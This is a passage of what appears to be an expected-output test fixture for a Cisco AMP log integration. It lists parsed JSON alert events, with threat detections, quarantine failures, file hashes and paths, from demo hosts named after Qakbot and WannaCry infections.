"host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + 
"log.offset": 3794, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6511, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + 
"Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 478000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9339, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + 
"user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493599", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12926, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": 
"6419303574240493597", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14119, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526295", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526294", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16498, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526293", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17684, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection_id": "6419303569945526292", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18870, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526291", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + 
"event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 20056, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526288", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21242, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" 
+ ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526287", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 22428, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection_id": "6419303569945526286", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 23614, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558988", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + 
"event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24800, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558989", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25986, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" 
+ ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558987", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27172, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection_id": "6419303565650558986", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 28358, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558985", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": 
"cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29544, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 30737, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + 
"Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 327000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + 